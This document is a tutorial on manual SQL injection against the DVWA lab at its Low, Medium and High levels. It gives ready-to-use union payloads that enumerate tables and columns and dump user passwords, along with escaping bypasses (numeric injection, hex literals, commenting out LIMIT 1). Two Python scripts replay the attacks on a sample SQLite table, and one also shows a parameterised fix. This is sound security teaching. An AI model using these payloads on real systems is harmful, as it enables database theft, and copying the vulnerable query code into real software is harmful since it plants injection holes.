SQL injection (SQLi) means supplying crafted input that breaks the structure of an application's SQL statement so that the database executes SQL of the attacker's choosing. The impact of an SQL injection vulnerability is severe, often ending with the entire database being dumped, yet SQL injection remains one of the most common web vulnerabilities today. A recent string of breach incidents reportedly came down to ordinary SQL injection vulnerabilities.
Manual injection approach
The automated injection tool sqlmap is easy to use, but it is still worth mastering the manual approach. The steps of a manual (non-blind) injection are, in brief:
1. Determine whether an injection point exists and whether it is character type or numeric type
2. Guess the number of fields in the SQL query statement
3. Determine the order in which the fields are displayed
4. Get the current database
5. Get the tables in the database
6. Get the field names in the table
7. Download the data
Low:
Exploitation
In a real attack the attacker cannot see the back-end code, so the manual injection steps below assume no access to the source.
1. Determine whether an injection point exists and whether it is character type or numeric type
Enter 1: the query succeeds. Enter 1' and '1'='2: the query fails and returns an empty result. Enter 1' or '1234'='1234: the query succeeds and returns multiple results. A quote-closing payload that changes the result set shows that the input sits inside single quotes, i.e. a character-type injection exists.
2. Guess the number of fields in the SQL query statement
Enter 1' or 1=1 order by 1 #: the query succeeds. Enter 1' or 1=1 order by 2 #: the query succeeds. Enter 1' or 1=1 order by 3 #: the query fails.
This shows that the executed SQL query selects only two fields, namely first name and surname.
(The number of fields can also be found by entering union select ... with an increasing number of columns until the query succeeds.)
3. Determine the order in which the fields are displayed
Enter 1' union select 1,2 #: the query succeeds, and the positions in which 1 and 2 are echoed show which column is displayed where. This indicates that the statement executed is select First name, Surname from table where id='ID' ...
4. Get the current database
Enter 1' union select 1,database() #: the query succeeds and the name of the current database is echoed in the second field.
5. Get the tables in the database
Enter 1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #: the query succeeds and lists the tables of the current database.
6. Get the field names in the table
Enter 1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #: the query succeeds and lists the columns of the users table.
7. Download the data
Enter 1' or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #: the query succeeds and dumps every user's id, name and password field.
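As an added example that is not part of the original walkthrough, the script below replays the seven Low-level steps against a constructed in-memory SQLite table shaped like DVWA's users table (constructed sample data, not the real dump). The vulnerable query concatenates the id inside single quotes exactly as the Low level does. Using SQLite instead of MySQL forces a few stand-ins, all of them assumptions: the line comment is `-- ` rather than `#`; sqlite_version(), sqlite_master and pragma_table_info stand in for database(), information_schema.tables and information_schema.columns; and because SQLite's group_concat takes a single expression, the dump joins the fields with ||. The technique at each step is the same.

```python
import sqlite3

# Constructed sample data shaped like DVWA's `users` table (an assumption, not the real dump).
ROWS = [
    (1, "admin", "admin", "hash-of-admin"),
    (2, "Gordon", "Brown", "hash-of-gordon"),
    (3, "Pablo", "Picasso", "hash-of-pablo"),
]


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", ROWS)
    return con


def vulnerable_lookup(con, user_id):
    """Low-level style: the id is pasted inside single quotes, so the injection is character type."""
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    try:
        return con.execute(sql).fetchall()
    except sqlite3.Error:
        return None  # the page's "query failed"


def walkthrough():
    """Replay the seven manual steps and return each probe's result keyed by step."""
    con = make_db()

    def q(payload):
        return vulnerable_lookup(con, payload)

    r = {}
    # 1. Is there an injection, and is it character or numeric?  A quote-closing
    #    payload that changes the result set means the input sits inside quotes.
    r["1_plain"] = q("1")
    r["1_and_false"] = q("1' and '1'='2")
    r["1_or_true"] = q("1' or '1234'='1234")
    # 2. Count the columns: ORDER BY n fails once n exceeds the column count.
    r["2_order_by_ok"] = {n: q(f"1' or 1=1 order by {n} -- ") is not None for n in (1, 2, 3)}
    # 3. Which column is echoed where: the union row shows the 1 and the 2 in position.
    r["3_positions"] = q("1' union select 1,2 -- ")
    # 4. A server-side function in the echoed column (sqlite_version() stands in for database()).
    r["4_version"] = q("1' union select 1,sqlite_version() -- ")
    # 5. Table names (sqlite_master stands in for information_schema.tables).
    r["5_tables"] = q("1' union select 1,group_concat(name) from sqlite_master where type='table' -- ")
    # 6. Column names (pragma_table_info stands in for information_schema.columns).
    r["6_columns"] = q("1' union select 1,group_concat(name) from pragma_table_info('users') -- ")
    # 7. Dump the data; SQLite's group_concat takes one expression, so the fields are joined with ||.
    r["7_dump"] = q("1' or 1=1 union select group_concat(user_id||first_name||last_name),"
                    "group_concat(password) from users -- ")
    return r


if __name__ == "__main__":
    for step, rows in walkthrough().items():
        print(f"{step:14} -> {'query failed' if rows is None else rows}")
```

Run it and compare each step's rows with the page's screenshots: the failing ORDER BY 3 fixes the column count at two, the (1, 2) row shows where each column is echoed, and the last probe returns the three legitimate rows plus one row carrying every user's data.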
Medium:
$id = mysql_real_escape_string($id);
As can be seen, the Medium-level code passes the id through the mysql_real_escape_string function, which escapes the special characters
\x00, \n, \r, \, ', " and \x1a, and the front-end page replaces the text box with a drop-down selection form in an attempt to control the user's input.
Exploitation
Although the front end uses a drop-down menu, we can still submit a maliciously constructed query parameter by intercepting the request (with a proxy, for example) and modifying the parameter.
1. Determine whether an injection point exists and whether it is character type or numeric type
Intercept the request and change the parameter id to 1' or 1=1 #: error. Change id to 1 or 1=1 #: the query succeeds.
This shows a numeric injection.
(Because the injection is numeric, the input is not wrapped in quotation marks, so the server-side mysql_real_escape_string does not help: a numeric payload contains no quotes to escape.)
2. Guess the number of fields in the SQL query statement
Change id to 1 order by 2 #: the query succeeds. Change id to 1 order by 3 #: error. This shows that the executed SQL query selects only two fields, first name and surname.
3. Determine the order in which the fields are displayed
Change id to 1 union select 1,2 #: the query succeeds, which indicates that the statement executed is select First name, Surname from table where id=ID ...
4. Get the current database
Change id to 1 union select 1,database() #: the query succeeds.
5. Get the tables in the database
Change id to 1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #: the query succeeds.
6. Get the field names in the table
Change id to 1 union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #: the query fails.
This is because the single quotation mark is escaped and becomes \'.
The escaping can be bypassed by writing the string as a MySQL hex literal, which needs no quotes: change id to 1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 # (0x7573657273 is 'users' in hex), and the query succeeds.
7. Download the data
Change id to 1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #: the query succeeds.
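The escaping-versus-numeric point of the Medium level, as an added example that is not DVWA's code: escape_like_mysql emulates the character substitutions the page lists for mysql_real_escape_string (an approximation written here, not the PHP function), medium_lookup pastes the escaped value without quotes exactly as the Medium level does, and hardened_lookup is the fix with a bound parameter. The same constructed SQLite users table is assumed, with sqlite_master standing in for information_schema. One caveat is SQLite-specific: it reads 0x7573657273 as an integer rather than as the string 'users', so the quote-free literal used here is char(117,115,101,114,115), which spells 'users' in both MySQL and SQLite.

```python
import sqlite3

# Constructed sample data shaped like DVWA's `users` table (an assumption, not the real dump).
ROWS = [
    (1, "admin", "admin", "hash-of-admin"),
    (2, "Gordon", "Brown", "hash-of-gordon"),
    (3, "Pablo", "Picasso", "hash-of-pablo"),
]


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", ROWS)
    return con


def escape_like_mysql(s):
    """Approximates mysql_real_escape_string for the characters the page lists; not the PHP function."""
    table = {"\x00": "\\0", "\n": "\\n", "\r": "\\r", "\\": "\\\\",
             "'": "\\'", '"': '\\"', "\x1a": "\\Z"}
    return "".join(table.get(c, c) for c in s)


def medium_lookup(con, user_id):
    """Medium-level style: escaped, then pasted without quotes, so the injection is numeric."""
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = {escape_like_mysql(user_id)}"
    try:
        return con.execute(sql).fetchall()
    except sqlite3.Error:
        return None  # the page's "error"


def hardened_lookup(con, user_id):
    """The fix: the value travels as a bound parameter and can never become SQL syntax."""
    return con.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?", (user_id,)
    ).fetchall()


USERS_AS_CHAR = "char(117,115,101,114,115)"  # 'users' spelled without quote characters


def demo():
    """Return the outcome of each probe keyed by name."""
    con = make_db()
    r = {}
    r["normal"] = medium_lookup(con, "1")
    # A quoted payload is escaped to 1\' or 1=1 #, which breaks the statement.
    r["quoted_payload"] = medium_lookup(con, "1' or 1=1 #")
    # A numeric payload has nothing to escape, so the condition is appended intact.
    r["numeric_payload"] = medium_lookup(con, "1 or 1=1")
    # A string literal inside the injected SELECT is escaped too and fails ...
    r["quoted_literal"] = medium_lookup(
        con, "1 union select 1,group_concat(sql) from sqlite_master where name='users'")
    # ... so spell it with a quote-free expression instead (the page uses 0x7573657273 on MySQL).
    r["char_literal"] = medium_lookup(
        con, f"1 union select 1,group_concat(sql) from sqlite_master where name={USERS_AS_CHAR}")
    # Dump the table; SQLite's group_concat takes one expression, so the fields are joined with ||.
    r["dump"] = medium_lookup(
        con, "1 or 1=1 union select group_concat(user_id||first_name||last_name),"
             "group_concat(password) from users")
    # With a bound parameter the payload is just a string that matches no user_id.
    r["hardened_normal"] = hardened_lookup(con, "1")
    r["hardened_payload"] = hardened_lookup(con, "1 or 1=1")
    return r


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name:18} -> {'error' if rows is None else rows}")
```

The char_literal probe returns the CREATE TABLE text from sqlite_master, which exposes the column names just as the page's information_schema.columns query does; the hardened_payload probe shows that once the id is bound as a parameter the same "1 or 1=1" string simply matches nothing.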
High:
$id = stripslashes($id);
$id = mysql_real_escape_string($id);
Compared with the Medium level, the High level only adds LIMIT 1 to the SQL query statement, intending to restrict the output to a single result.
Exploitation
LIMIT 1 is added, but we can comment it out with #. Because the manual injection process is otherwise the same as at the Low level, only the last step, downloading the data, is shown.
Enter 1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #: the query succeeds. One point deserves specific mention: at the High level the page where the query is submitted is not the page that displays the results, and no 302 redirect connects the two. The purpose is to defeat ordinary sqlmap injection: during injection sqlmap cannot see the query result on the page it submits to, so it gets no feedback and cannot proceed further.